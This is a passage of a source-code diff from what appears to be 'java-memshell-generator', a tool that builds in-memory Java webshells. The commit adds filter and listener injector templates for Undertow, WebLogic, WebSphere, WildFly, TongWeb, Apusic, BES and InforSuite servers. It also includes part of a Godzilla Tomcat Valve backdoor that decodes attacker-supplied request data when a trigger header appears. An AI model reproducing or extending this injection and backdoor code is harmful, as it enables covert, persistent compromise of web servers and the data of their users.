for (int i = 0; i < methods.length; i++) {
if (methods[i].getName().equals(methodName) && methods[i].getParameterTypes().length == 0) {
method = methods[i];
break;
}
}
} else {
method = tempClass.getDeclaredMethod(methodName, paramClazz);
}
} catch (NoSuchMethodException e) {
tempClass = tempClass.getSuperclass();
}
}
if (method == null) {
throw new NoSuchMethodException(methodName);
}
method.setAccessible(true);
if (obj instanceof Class) {
try {
return method.invoke(null, param);
} catch (IllegalAccessException e) {
throw new RuntimeException(e.getMessage());
}
} else {
try {
return method.invoke(obj, param);
} catch (IllegalAccessException e) {
throw new RuntimeException(e.getMessage());
}
}
}
}
@@ -63,12 +63,18 @@ public class UndertowFilterInjectorTpl {
return contexts; return contexts;
} }
private Object getFilter(Object context) { private ClassLoader getWebAppClassLoader(Object context) throws Exception {
Object filter = null; try {
ClassLoader classLoader = Thread.currentThread().getContextClassLoader(); return ((ClassLoader) invokeMethod(context, "getClassLoader", null, null));
if (classLoader == null) { } catch (Exception e) {
classLoader = context.getClass().getClassLoader(); Object deploymentInfo = getFV(context, "deploymentInfo");
return ((ClassLoader) invokeMethod(deploymentInfo, "getClassLoader", null, null));
} }
}
private Object getFilter(Object context) throws Exception {
Object filter = null;
ClassLoader classLoader = getWebAppClassLoader(context);
try { try {
filter = classLoader.loadClass(getClassName()).newInstance(); filter = classLoader.loadClass(getClassName()).newInstance();
} catch (Exception e) { } catch (Exception e) {
@@ -53,13 +53,18 @@ public class UndertowListenerInjectorTpl {
return contexts; return contexts;
} }
private ClassLoader getWebAppClassLoader(Object context) throws Exception {
private Object getListener(Object context) { try {
Object listener = null; return ((ClassLoader) invokeMethod(context, "getClassLoader", null, null));
ClassLoader classLoader = Thread.currentThread().getContextClassLoader(); } catch (Exception e) {
if (classLoader == null) { Object deploymentInfo = getFV(context, "deploymentInfo");
classLoader = context.getClass().getClassLoader(); return ((ClassLoader) invokeMethod(deploymentInfo, "getClassLoader", null, null));
} }
}
private Object getListener(Object context) throws Exception {
Object listener = null;
ClassLoader classLoader = getWebAppClassLoader(context);
try { try {
listener = classLoader.loadClass(getClassName()).newInstance(); listener = classLoader.loadClass(getClassName()).newInstance();
} catch (Exception e) { } catch (Exception e) {
@@ -146,12 +146,17 @@ public class WebLogicFilterInjectorTpl {
return webappContexts.toArray(); return webappContexts.toArray();
} }
private Object getFilter(Object context) { public ClassLoader getWebAppClassLoader(Object context) throws Exception {
Object filter = null; try {
ClassLoader classLoader = Thread.currentThread().getContextClassLoader(); return ((ClassLoader) invokeMethod(context, "getClassLoader", null, null));
if (classLoader == null) { } catch (Exception e) {
classLoader = context.getClass().getClassLoader(); return ((ClassLoader) getFV(context, "classLoader"));
} }
}
private Object getFilter(Object context) throws Exception {
Object filter = null;
ClassLoader classLoader = getWebAppClassLoader(context);
try { try {
filter = classLoader.loadClass(getClassName()).newInstance(); filter = classLoader.loadClass(getClassName()).newInstance();
} catch (Exception e) { } catch (Exception e) {
@@ -140,13 +140,18 @@ public class WebLogicListenerInjectorTpl {
return webappContexts.toArray(); return webappContexts.toArray();
} }
private Object getListener(Object context) { public ClassLoader getWebAppClassLoader(Object context) throws Exception {
try {
return ((ClassLoader) invokeMethod(context, "getClassLoader", null, null));
} catch (Exception e) {
return ((ClassLoader) getFV(context, "classLoader"));
}
}
private Object getListener(Object context) throws Exception {
Object listener = null; Object listener = null;
ClassLoader classLoader = Thread.currentThread().getContextClassLoader(); ClassLoader classLoader = getWebAppClassLoader(context);
if (classLoader == null) {
classLoader = context.getClass().getClassLoader();
}
try { try {
listener = classLoader.loadClass(getClassName()).newInstance(); listener = classLoader.loadClass(getClassName()).newInstance();
} catch (Exception e) { } catch (Exception e) {
@@ -202,12 +202,17 @@ public class WebSphereFilterInjectorTpl {
} }
} }
public Object getFilter(Object context) { private ClassLoader getWebAppClassLoader(Object context) throws Exception {
Object filter = null; try {
ClassLoader classLoader = Thread.currentThread().getContextClassLoader(); return ((ClassLoader) invokeMethod(context, "getClassLoader", null, null));
if (classLoader == null) { } catch (Exception e) {
classLoader = context.getClass().getClassLoader(); return ((ClassLoader) getFV(context, "loader"));
} }
}
public Object getFilter(Object context) throws Exception {
Object filter = null;
ClassLoader classLoader = getWebAppClassLoader(context);
try { try {
filter = classLoader.loadClass(getClassName()).newInstance(); filter = classLoader.loadClass(getClassName()).newInstance();
} catch (Exception e) { } catch (Exception e) {
@@ -64,12 +64,17 @@ public class WebSphereListenerInjectorTpl {
return contexts; return contexts;
} }
private Object getListener(Object context) { private ClassLoader getWebAppClassLoader(Object context) throws Exception {
Object listener = null; try {
ClassLoader classLoader = Thread.currentThread().getContextClassLoader(); return ((ClassLoader) invokeMethod(context, "getClassLoader", null, null));
if (classLoader == null) { } catch (Exception e) {
classLoader = context.getClass().getClassLoader(); return ((ClassLoader) getFV(context, "loader"));
} }
}
private Object getListener(Object context) throws Exception {
Object listener = null;
ClassLoader classLoader = getWebAppClassLoader(context);
try { try {
listener = classLoader.loadClass(getClassName()).newInstance(); listener = classLoader.loadClass(getClassName()).newInstance();
} catch (Exception e) { } catch (Exception e) {
@@ -137,4 +142,46 @@ public class WebSphereListenerInjectorTpl {
} }
return null; return null;
} }
public static synchronized Object invokeMethod(final Object obj, final String methodName, Class[] paramClazz, Object[] param) throws NoSuchMethodException, InvocationTargetException, IllegalAccessException {
Class clazz = (obj instanceof Class) ? (Class) obj : obj.getClass();
Method method = null;
Class tempClass = clazz;
while (method == null && tempClass != null) {
try {
if (paramClazz == null) {
// Get all declared methods of the class
Method[] methods = tempClass.getDeclaredMethods();
for (int i = 0; i < methods.length; i++) {
if (methods[i].getName().equals(methodName) && methods[i].getParameterTypes().length == 0) {
method = methods[i];
break;
}
}
} else {
method = tempClass.getDeclaredMethod(methodName, paramClazz);
}
} catch (NoSuchMethodException e) {
tempClass = tempClass.getSuperclass();
}
}
if (method == null) {
throw new NoSuchMethodException(methodName);
}
method.setAccessible(true);
if (obj instanceof Class) {
try {
return method.invoke(null, param);
} catch (IllegalAccessException e) {
throw new RuntimeException(e.getMessage());
}
} else {
try {
return method.invoke(obj, param);
} catch (IllegalAccessException e) {
throw new RuntimeException(e.getMessage());
}
}
}
} }
@@ -62,14 +62,19 @@ public class WildFlyFilterInjectorTpl {
return contexts; return contexts;
} }
private ClassLoader getWebAppClassLoader(Object context) throws Exception {
try {
return ((ClassLoader) invokeMethod(context, "getClassLoader", null, null));
} catch (Exception e) {
Object deploymentInfo = getFV(context, "deploymentInfo");
return ((ClassLoader) invokeMethod(deploymentInfo, "getClassLoader", null, null));
}
}
private Object getFilter(Object context) { private Object getFilter(Object context) throws Exception {
Object filter = null; Object filter = null;
ClassLoader classLoader = Thread.currentThread().getContextClassLoader(); ClassLoader classLoader = getWebAppClassLoader(context);
if (classLoader == null) {
classLoader = context.getClass().getClassLoader();
}
try { try {
filter = classLoader.loadClass(getClassName()).newInstance(); filter = classLoader.loadClass(getClassName()).newInstance();
} catch (Exception e) { } catch (Exception e) {
@@ -50,14 +50,19 @@ public class WildFlyListenerInjectorTpl {
return contexts; return contexts;
} }
private ClassLoader getWebAppClassLoader(Object context) throws Exception {
try {
return ((ClassLoader) invokeMethod(context, "getClassLoader", null, null));
} catch (Exception e) {
Object deploymentInfo = getFV(context, "deploymentInfo");
return ((ClassLoader) invokeMethod(deploymentInfo, "getClassLoader", null, null));
}
}
private Object getListener(Object context) { private Object getListener(Object context) throws Exception {
Object listener = null; Object listener = null;
ClassLoader classLoader = Thread.currentThread().getContextClassLoader(); ClassLoader classLoader = getWebAppClassLoader(context);
if (classLoader == null) {
classLoader = context.getClass().getClassLoader();
}
try { try {
listener = classLoader.loadClass(getClassName()).newInstance(); listener = classLoader.loadClass(getClassName()).newInstance();
} catch (Exception e) { } catch (Exception e) {
@@ -31,6 +31,32 @@ public class InjectorUtil {
static { static {
INJECTOR_CLASSNAME_MAP.put("ApusicListenerInjector", ApusicListenerInjectorTpl.class.getName());
INJECTOR_CLASSNAME_MAP.put("ApusicFilterInjector", ApusicFilterInjectorTpl.class.getName());
Map<String, String> apusicMap = new HashMap();
apusicMap.put(Constants.SHELL_LISTENER, "ApusicListenerInjector");
apusicMap.put(Constants.SHELL_FILTER, "ApusicFilterInjector");
classMap.put(Constants.SERVER_APUSIC, apusicMap);
INJECTOR_CLASSNAME_MAP.put("BESListenerInjector", BESListenerInjectorTpl.class.getName());
INJECTOR_CLASSNAME_MAP.put("BESFilterInjector", BESFilterInjectorTpl.class.getName());
Map<String, String> besMap = new HashMap();
besMap.put(Constants.SHELL_LISTENER, "BESListenerInjector");
besMap.put(Constants.SHELL_FILTER, "BESFilterInjector");
classMap.put(Constants.SERVER_BES, besMap);
INJECTOR_CLASSNAME_MAP.put("InforSuiteListenerInjector", InforSuiteListenerInjectorTpl.class.getName());
INJECTOR_CLASSNAME_MAP.put("InforSuiteFilterInjector", InforSuiteFilterInjectorTpl.class.getName());
Map<String, String> inforsuiteMap = new HashMap();
inforsuiteMap.put(Constants.SHELL_LISTENER, "InforSuiteListenerInjector");
inforsuiteMap.put(Constants.SHELL_FILTER, "InforSuiteFilterInjector");
classMap.put(Constants.SERVER_INFORSUITE, inforsuiteMap);
INJECTOR_CLASSNAME_MAP.put("TongWebListenerInjector", TongWebListenerInjectorTpl.class.getName());
Map<String, String> tongwebMap = new HashMap();
tongwebMap.put(Constants.SHELL_LISTENER, "TongWebListenerInjector");
classMap.put(Constants.SERVER_TONGWEB, tongwebMap);
INJECTOR_CLASSNAME_MAP.put("GlassfishListenerInjector", GlassFishListenerInjectorTpl.class.getName()); INJECTOR_CLASSNAME_MAP.put("GlassfishListenerInjector", GlassFishListenerInjectorTpl.class.getName());
INJECTOR_CLASSNAME_MAP.put("GlassfishFilterInjector", GlassFishFilterInjectorTpl.class.getName()); INJECTOR_CLASSNAME_MAP.put("GlassfishFilterInjector", GlassFishFilterInjectorTpl.class.getName());
@@ -56,13 +82,13 @@ public class InjectorUtil {
INJECTOR_CLASSNAME_MAP.put("TomcatListenerInjector", TomcatListenerInjectorTpl.class.getName()); INJECTOR_CLASSNAME_MAP.put("TomcatListenerInjector", TomcatListenerInjectorTpl.class.getName());
INJECTOR_CLASSNAME_MAP.put("TomcatFilterInjector", TomcatFilterInjectorTpl.class.getName()); INJECTOR_CLASSNAME_MAP.put("TomcatFilterInjector", TomcatFilterInjectorTpl.class.getName());
INJECTOR_CLASSNAME_MAP.put("TomcatValveInjector",TomcatValveInjectorTpl.class.getName()); INJECTOR_CLASSNAME_MAP.put("TomcatValveInjector", TomcatValveInjectorTpl.class.getName());
Map<String, String> tomcatMap = new HashMap(); Map<String, String> tomcatMap = new HashMap();
tomcatMap.put(Constants.SHELL_LISTENER, "TomcatListenerInjector"); tomcatMap.put(Constants.SHELL_LISTENER, "TomcatListenerInjector");
tomcatMap.put(Constants.SHELL_FILTER, "TomcatFilterInjector"); tomcatMap.put(Constants.SHELL_FILTER, "TomcatFilterInjector");
tomcatMap.put(Constants.SHELL_JAKARTA_LISTENER, "TomcatListenerInjector"); tomcatMap.put(Constants.SHELL_JAKARTA_LISTENER, "TomcatListenerInjector");
tomcatMap.put(Constants.SHELL_JAKARTA_FILTER, "TomcatFilterInjector"); tomcatMap.put(Constants.SHELL_JAKARTA_FILTER, "TomcatFilterInjector");
tomcatMap.put(Constants.SHELL_VALVE,"TomcatValveInjector"); tomcatMap.put(Constants.SHELL_VALVE, "TomcatValveInjector");
classMap.put(Constants.SERVER_TOMCAT, tomcatMap); classMap.put(Constants.SERVER_TOMCAT, tomcatMap);
@@ -17,6 +17,10 @@ public class ResponseUtil {
METHOD_BODY_MAP.put("jetty", getJettyMethodBody()); METHOD_BODY_MAP.put("jetty", getJettyMethodBody());
METHOD_BODY_MAP.put("websphere", getWebsphereMethodBody()); METHOD_BODY_MAP.put("websphere", getWebsphereMethodBody());
METHOD_BODY_MAP.put("undertow", getUndertowMethodBody()); METHOD_BODY_MAP.put("undertow", getUndertowMethodBody());
METHOD_BODY_MAP.put("inforsuite", getCommonMethodBody());
METHOD_BODY_MAP.put("bes", getCommonMethodBody());
METHOD_BODY_MAP.put("tongweb", getTongwebMethodBody());
METHOD_BODY_MAP.put("apusic", getApusicMethodBody());
} }
public static String getMethodBody(String serverType) { public static String getMethodBody(String serverType) {
@@ -73,4 +77,24 @@ public class ResponseUtil {
"return response;}"; "return response;}";
} }
private static String getTongwebMethodBody() {
return "{javax.servlet.http.HttpServletResponse response = null;" +
" try {" +
" response = (javax.servlet.http.HttpServletResponse) getFV(getFV($1, \"request\"), \"response\");" +
" } catch (Exception ex) {" +
" try {" +
" response = (javax.servlet.http.HttpServletResponse) getFV($1, \"response\");" +
" } catch (Exception ex1) {" +
" }" +
" }\n" +
" return response;}";
}
private static String getApusicMethodBody() {
return "{javax.servlet.http.HttpServletResponse response;" +
" response = (javax.servlet.http.HttpServletResponse) getFV(getFV($1, \"http\"),\"response\");" +
" return response;}";
}
} }
+1 -1
View File
@@ -4,7 +4,7 @@
<parent> <parent>
<groupId>jmg</groupId> <groupId>jmg</groupId>
<artifactId>java-memshell-generator</artifactId> <artifactId>java-memshell-generator</artifactId>
<version>1.0.8</version> <version>1.0.9</version>
</parent> </parent>
<artifactId>jmg-custom</artifactId> <artifactId>jmg-custom</artifactId>
Binary file not shown.

After

Width:  |  Height:  |  Size: 53 KiB

+1 -1
View File
@@ -6,7 +6,7 @@
<parent> <parent>
<groupId>jmg</groupId> <groupId>jmg</groupId>
<artifactId>java-memshell-generator</artifactId> <artifactId>java-memshell-generator</artifactId>
<version>1.0.8</version> <version>1.0.9</version>
</parent> </parent>
<artifactId>jmg-extender</artifactId> <artifactId>jmg-extender</artifactId>
+1 -1
View File
@@ -4,7 +4,7 @@
<parent> <parent>
<groupId>jmg</groupId> <groupId>jmg</groupId>
<artifactId>java-memshell-generator</artifactId> <artifactId>java-memshell-generator</artifactId>
<version>1.0.8</version> <version>1.0.9</version>
</parent> </parent>
<artifactId>jmg-godzilla</artifactId> <artifactId>jmg-godzilla</artifactId>
@@ -75,7 +75,6 @@ public class GodzillaValve extends ClassLoader implements Valve {
public void invoke(Request request, Response response) throws IOException, ServletException { public void invoke(Request request, Response response) throws IOException, ServletException {
try { try {
if (request.getHeader(headerName) != null && request.getHeader(headerName).contains(headerValue)) { if (request.getHeader(headerName) != null && request.getHeader(headerName).contains(headerValue)) {
System.out.println(headerName + ":" + headerValue);
HttpSession session = request.getSession(); HttpSession session = request.getSession();
byte[] data = base64Decode(request.getParameter(pass)); byte[] data = base64Decode(request.getParameter(pass));
data = this.x(data, false); data = this.x(data, false);
+1 -1
View File
@@ -3,7 +3,7 @@
<parent> <parent>
<artifactId>java-memshell-generator</artifactId> <artifactId>java-memshell-generator</artifactId>
<groupId>jmg</groupId> <groupId>jmg</groupId>
<version>1.0.8</version> <version>1.0.9</version>
</parent> </parent>
<modelVersion>4.0.0</modelVersion> <modelVersion>4.0.0</modelVersion>
<artifactId>jmg-gui</artifactId> <artifactId>jmg-gui</artifactId>
@@ -112,7 +112,8 @@ public class jMGForm {
ArrayList<String> servletApiServerBox = new ArrayList<>(Arrays.asList( ArrayList<String> servletApiServerBox = new ArrayList<>(Arrays.asList(
Constants.SERVER_TOMCAT, Constants.SERVER_RESIN, Constants.SERVER_WEBLOGIC, Constants.SERVER_WEBSPHERE, Constants.SERVER_TOMCAT, Constants.SERVER_RESIN, Constants.SERVER_WEBLOGIC, Constants.SERVER_WEBSPHERE,
Constants.SERVER_JETTY, Constants.SERVER_UNDERTOW, Constants.SERVER_GLASSFISH, Constants.SERVER_JBOSS Constants.SERVER_JETTY, Constants.SERVER_UNDERTOW, Constants.SERVER_GLASSFISH, Constants.SERVER_JBOSS,
Constants.SERVER_TONGWEB, Constants.SERVER_APUSIC, Constants.SERVER_BES, Constants.SERVER_INFORSUITE
)); ));
ArrayList<String> interceptorServerBox = new ArrayList<>(Arrays.asList(Constants.SERVER_SPRING_MVC)); ArrayList<String> interceptorServerBox = new ArrayList<>(Arrays.asList(Constants.SERVER_SPRING_MVC));
@@ -381,8 +382,6 @@ public class jMGForm {
config.setUrlPattern("/*"); config.setUrlPattern("/*");
} }
} }
if (config.getOutputFormat().contains(Constants.FORMAT_BCEL))
config.setLoaderClassName(ClassNameUtil.getRandomLoaderClassName());
config.setInjectorSimpleClassName(CommonUtil.getSimpleName(config.getInjectorClassName())); config.setInjectorSimpleClassName(CommonUtil.getSimpleName(config.getInjectorClassName()));
} }
+1 -1
View File
@@ -4,7 +4,7 @@
<parent> <parent>
<groupId>jmg</groupId> <groupId>jmg</groupId>
<artifactId>java-memshell-generator</artifactId> <artifactId>java-memshell-generator</artifactId>
<version>1.0.8</version> <version>1.0.9</version>
</parent> </parent>
<artifactId>jmg-neoregeorg</artifactId> <artifactId>jmg-neoregeorg</artifactId>
+1 -1
View File
@@ -7,7 +7,7 @@
<parent> <parent>
<groupId>jmg</groupId> <groupId>jmg</groupId>
<artifactId>java-memshell-generator</artifactId> <artifactId>java-memshell-generator</artifactId>
<version>1.0.8</version> <version>1.0.9</version>
</parent> </parent>
<artifactId>jmg-sdk</artifactId> <artifactId>jmg-sdk</artifactId>
+1 -1
View File
@@ -4,7 +4,7 @@
<parent> <parent>
<groupId>jmg</groupId> <groupId>jmg</groupId>
<artifactId>java-memshell-generator</artifactId> <artifactId>java-memshell-generator</artifactId>
<version>1.0.8</version> <version>1.0.9</version>
</parent> </parent>
<artifactId>jmg-suo5</artifactId> <artifactId>jmg-suo5</artifactId>
+1 -1
View File
@@ -6,7 +6,7 @@
<parent> <parent>
<groupId>jmg</groupId> <groupId>jmg</groupId>
<artifactId>java-memshell-generator</artifactId> <artifactId>java-memshell-generator</artifactId>
<version>1.0.8</version> <version>1.0.9</version>
</parent> </parent>
<artifactId>jmg-woodpecker</artifactId> <artifactId>jmg-woodpecker</artifactId>
@@ -36,6 +36,10 @@ public class ShellHelper implements IHelper {
enumServerType.add(Constants.SERVER_UNDERTOW); enumServerType.add(Constants.SERVER_UNDERTOW);
enumServerType.add(Constants.SERVER_GLASSFISH); enumServerType.add(Constants.SERVER_GLASSFISH);
enumServerType.add(Constants.SERVER_JBOSS); enumServerType.add(Constants.SERVER_JBOSS);
enumServerType.add(Constants.SERVER_TONGWEB);
enumServerType.add(Constants.SERVER_APUSIC);
enumServerType.add(Constants.SERVER_BES);
enumServerType.add(Constants.SERVER_INFORSUITE);
server_type.setEnumValue(enumServerType); server_type.setEnumValue(enumServerType);
server_type.setDefaultValue(Constants.SERVER_TOMCAT); server_type.setDefaultValue(Constants.SERVER_TOMCAT);
server_type.setRequired(true); server_type.setRequired(true);
+1 -1
View File
@@ -5,7 +5,7 @@
<groupId>jmg</groupId> <groupId>jmg</groupId>
<artifactId>java-memshell-generator</artifactId> <artifactId>java-memshell-generator</artifactId>
<packaging>pom</packaging> <packaging>pom</packaging>
<version>1.0.8</version> <version>1.0.9</version>
<modules> <modules>
<module>jmg-antsword</module> <module>jmg-antsword</module>
<module>jmg-behinder</module> <module>jmg-behinder</module>